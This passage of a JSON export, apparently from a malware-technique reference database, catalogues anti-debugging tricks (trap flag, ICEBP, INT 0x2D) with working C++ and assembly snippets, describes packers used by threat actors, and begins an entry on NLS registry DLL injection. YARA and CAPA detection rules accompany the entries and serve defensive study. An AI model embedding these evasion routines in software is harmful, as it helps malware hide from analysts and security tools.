                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/214/",
                    "description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/TrapFlag.cpp",
                    "plain_code": "#include \"pch.h\"\r\n\r\n#include \"TrapFlag.h\"\r\n\r\n/*\r\n\tThis technique is similar to exceptions based debugger detections.\r\n\tYou enable the trap flag in the current process and check whether\r\n\tan exception is raised or not. If an exception is not raised, you\r\n\tcan assume that a debugger has “swallowed” the exception for us,\r\n\tand that the program is being traced. The beauty of this approach\r\n\tis that it detects every debugger, user mode or kernel mode,\r\n\tbecause they all use the trap flag for tracing a program.\r\n\tVectored Exception Handling is used here because SEH is an\r\n\tanti-debug trick in itself.\r\n*/\r\n\r\nstatic BOOL SwallowedException = TRUE;\r\n\r\nstatic LONG CALLBACK VectoredHandler(\r\n\t_In_ PEXCEPTION_POINTERS ExceptionInfo\r\n)\r\n{\r\n\tSwallowedException = FALSE;\r\n\t\r\n\tif (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP)\r\n\t\treturn EXCEPTION_CONTINUE_EXECUTION;\r\n\t\t\r\n\treturn EXCEPTION_CONTINUE_SEARCH;\r\n}\r\n\r\n\r\n\r\nBOOL TrapFlag()\r\n{\r\n\tPVOID Handle = AddVectoredExceptionHandler(1, VectoredHandler);\r\n\tSwallowedException = TRUE;\r\n\r\n#ifdef _WIN64\r\n\tUINT64 eflags = __readeflags();\r\n#else\r\n\tUINT eflags = __readeflags();\r\n#endif\r\n\r\n\t//  Set the trap flag\r\n\teflags |= 0x100;\r\n\t__writeeflags(eflags);\r\n\r\n\tRemoveVectoredExceptionHandler(Handle);\r\n\treturn SwallowedException;\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 85,
                    "key": "capa_trap_flag",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Trap_Flag",
                    "rule": "rule:\r\n  meta:\r\n    name: check for trap flag exception\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    authors:\r\n      - michael.hunhoff@mandiant.com\r\n    scope: basic block\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection [B0001]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/TrapFlag.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x431680\r\n      - al-khaser_x64.exe_:0x140030CB0\r\n  features:\r\n    - and:\r\n      - or:\r\n        - description: read/write EFLAGS register\r\n        - and:\r\n          - mnemonic: pushf\r\n          - mnemonic: popf\r\n        - and:\r\n          - mnemonic: pushfd\r\n          - mnemonic: popfd\r\n        - and:\r\n          - mnemonic: pushfq\r\n          - mnemonic: popfq\r\n      - or:\r\n        - description: set trap flag\r\n        - and:\r\n          - mnemonic: or\r\n          - number: 0x100\r\n        - and:\r\n          - mnemonic: bts\r\n          - number: 0x8"
                }
            ]
        },
        {
            "id": 213,
            "unprotect_id": "U0130",
            "name": "ICE 0xF1",
            "categories": [
                {
                    "id": 3,
                    "key": "anti-debugging",
                    "label": "Anti-Debugging"
                }
            ],
            "description": "ICEBP is an undocumented instruction that serves as a single byte interrupt 1, generating a single step exception. It can be used to detect if the program is traced.",
            "resources": "https://www.autosectools.com/anti-debugging-with-exceptions.pdf",
            "tags": "0xf1,icebp",
            "snippets": [
                {
                    "id": 100,
                    "language": {
                        "id": 5,
                        "label": "Assembly",
                        "code_class": "x86asm"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/213/",
                    "description": "",
                    "plain_code": "BOOL IsDebuggerPresent_IceBp()\r\n{\r\n    __try\r\n    { \r\n        __asm __emit 0xF1 \r\n    }\r\n    __except(1) \r\n    { \r\n        return FALSE; \r\n    }\r\n    return TRUE;\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 70,
                    "key": "detect_interrupts",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "Detect_Interrupts",
                    "rule": "rule Detect_Interrupt: AntiDebug {\r\n    meta: \r\n        description = \"Detect Interrupt instruction\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule / the rule can be slow to use\"\r\n    strings:\r\n        $int3 = { CC }\r\n        $intCD = { CD }\r\n        $int03 = { 03 }\r\n        $int2D = { 2D }\r\n        $ICE = { F1 }\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them\r\n}"
                },
                {
                    "id": 87,
                    "key": "capa_check_icebp",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Check_ICEBP",
                    "rule": "rule:\r\n  meta:\r\n    name: execute anti-debugging instructions\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    authors:\r\n      - moritz.raabe@mandiant.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Anti-debugging Instructions [B0001.034]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x401300\r\n  features:\r\n    - or:\r\n      - count(mnemonic(rdtsc)): 2 or more\r\n      - mnemonic: icebp"
                }
            ]
        },
        {
            "id": 212,
            "unprotect_id": "U0129",
            "name": "INT 0x2D",
            "categories": [
                {
                    "id": 3,
                    "key": "anti-debugging",
                    "label": "Anti-Debugging"
                }
            ],
            "description": "When the instruction `INT2D` is executed, the exception `EXCEPTION_BREAKPOINT` is raised. Windows uses the EIP register as an exception address and then increments the EIP register value. Windows also examines the value of the EAX register while `INT2D` is executed.",
            "resources": "https://www.autosectools.com/anti-debugging-with-exceptions.pdf\r\nhttps://anti-debug.checkpoint.com/techniques/assembly.html#int2d",
            "tags": "int2d",
            "snippets": [
                {
                    "id": 99,
                    "language": {
                        "id": 5,
                        "label": "Assembly",
                        "code_class": "x86asm"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/212/",
                    "description": "",
                    "plain_code": "BOOL IsDebuggerPresent_Int2d()\r\n{\r\n    __try\r\n    { \r\n        __asm int 0x2d \r\n    }\r\n    __except(1)\r\n    {\r\n        return FALSE;\r\n    }\r\n    return TRUE;\r\n}"
                },
                {
                    "id": 102,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/212/",
                    "description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/Interrupt_0x2d.cpp",
                    "plain_code": "#include \"pch.h\"\r\n\r\n#include \"Interrupt_0x2d.h\"\r\n\r\n/*\r\nThe Interrupt_0x2d function will check to see if a debugger is attached to the current process. It does this by setting up\r\nSEH and using the Int 2D instruction which will only cause an exception if there is no debugger. Also when used in OllyDBG\r\nit will skip a byte in the disassembly which could be used to detect the debugger.\r\nVectored Exception Handling is used here because SEH is an anti-debug trick in itself.\r\n*/\r\n\r\nextern \"C\" void __int2d();\r\n\r\nstatic BOOL SwallowedException = TRUE;\r\n\r\nstatic LONG CALLBACK VectoredHandler(\r\n\t_In_ PEXCEPTION_POINTERS ExceptionInfo\r\n)\r\n{\r\n\tSwallowedException = FALSE;\r\n\tif (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT)\r\n\t{\r\n\t\t//The Int 2D instruction already increased EIP/RIP so we don't do that (although it wouldnt hurt).\r\n\t\treturn EXCEPTION_CONTINUE_EXECUTION;\r\n\t}\r\n\treturn EXCEPTION_CONTINUE_SEARCH;\r\n}\r\n\r\nBOOL Interrupt_0x2d()\r\n{\r\n\tPVOID Handle = AddVectoredExceptionHandler(1, VectoredHandler);\r\n\tSwallowedException = TRUE;\r\n\t__int2d();\r\n\tRemoveVectoredExceptionHandler(Handle);\r\n\treturn SwallowedException;\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 70,
                    "key": "detect_interrupts",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "Detect_Interrupts",
                    "rule": "rule Detect_Interrupt: AntiDebug {\r\n    meta: \r\n        description = \"Detect Interrupt instruction\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule / the rule can be slow to use\"\r\n    strings:\r\n        $int3 = { CC }\r\n        $intCD = { CD }\r\n        $int03 = { 03 }\r\n        $int2D = { 2D }\r\n        $ICE = { F1 }\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them\r\n}"
                }
            ]
        },
        {
            "id": 211,
            "unprotect_id": "U1428",
            "name": "BobSoft Mini Delphi Packer",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "The Delphi programming language can be an easy way to write applications and programs that leverage Windows API functions. In fact, some actors deliberately include the default libraries as a diversion to hamper static analysis and make the application \"look legit\" during dynamic analysis. \r\n\r\nThe packer goes to great lengths to ensure that it is not running in an analysis environment. Normal user activity involves many application windows being rotated or changed over a period of time. The first variant of the packer uses `GetForegroundWindow` API to check for the user activity of changing windows at least three times before it executes further. If it does not see the change of windows, it puts itself into an infinite sleep.",
            "resources": "https://www.mandiant.com/resources/increased-use-of-delphi-packer-to-evade-malware-classification",
            "tags": "delphi,packer",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 117,
                    "key": "yara_detect_bobsoft",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Bobsoft",
                    "rule": "rule PEiD_Bundle_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_With_Unpack_Code_BoB_Bobsoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 6A 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_102_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Imploder_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_BoB_Bobsoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 210,
            "unprotect_id": "U1427",
            "name": "CryptOne",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "A packing software called CryptOne became popular among some major threat actors. It was first reported by Fox-IT that the group behind Wastedlocker has begun using it, as well as Netwalker, Gozi ISFB v3, ZLoader, Emotet, Dridex, and Smokeloader.",
            "resources": "https://www.deepinstinct.com/blog/a-deep-dive-into-packing-software-cryptone\r\nhttps://github.com/Tera0017/de-CryptOne",
            "tags": "cryptone",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 209,
            "unprotect_id": "U1426",
            "name": "CloudEye/DarkEye",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "CloudEyE, an evolved version of DarkEyE, allows threat actors to use different types of malware of their choice and make it undetectable to anti-virus solutions. This program is being sold by legitimate Italian company which markets it as a tool for developers that want to protect their program from piracy and reverse engineering. The tutorials published and forum posts about CloudEyE prove that the objective of the program is to aid malicious activities.",
            "resources": "https://www.securitycode.eu/\r\nhttps://atlas-cybersecurity.com/cyber-threats/cloudeye-darkeye-evolved/",
            "tags": "cloudeye,darkeye",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 208,
            "unprotect_id": "U1237",
            "name": "NlsCodeInjectionThroughRegistry",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "Dll injection through registry modification of NLS code page ID.\r\n\r\nThere is two ways to accomplish this technique:\r\n\r\n- Calling `SetThreadLocale` and set up an export function named `NlsDllCodePageTranslation`, where your main payload is in there. \r\n\r\n- The second method allows to do this technique using `SetConsoleCp` or `SetConsoleOutputCP`.\r\n\r\nIf the process is not console based, it is possible to allocate one with `AllocConsole`.\r\n\r\nThe POC used a position independent shellcode and inject it to a remote process, which works as a stager to the actual loading of the dll.",
            "resources": "https://github.com/NtQuerySystemInformation/NlsCodeInjectionThroughRegistry",
            "tags": "",
            "snippets": [
                {
                    "id": 94,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/208/",
                    "description": "Original source code: https://github.com/NtQuerySystemInformation/NlsCodeInjectionThroughRegistry",
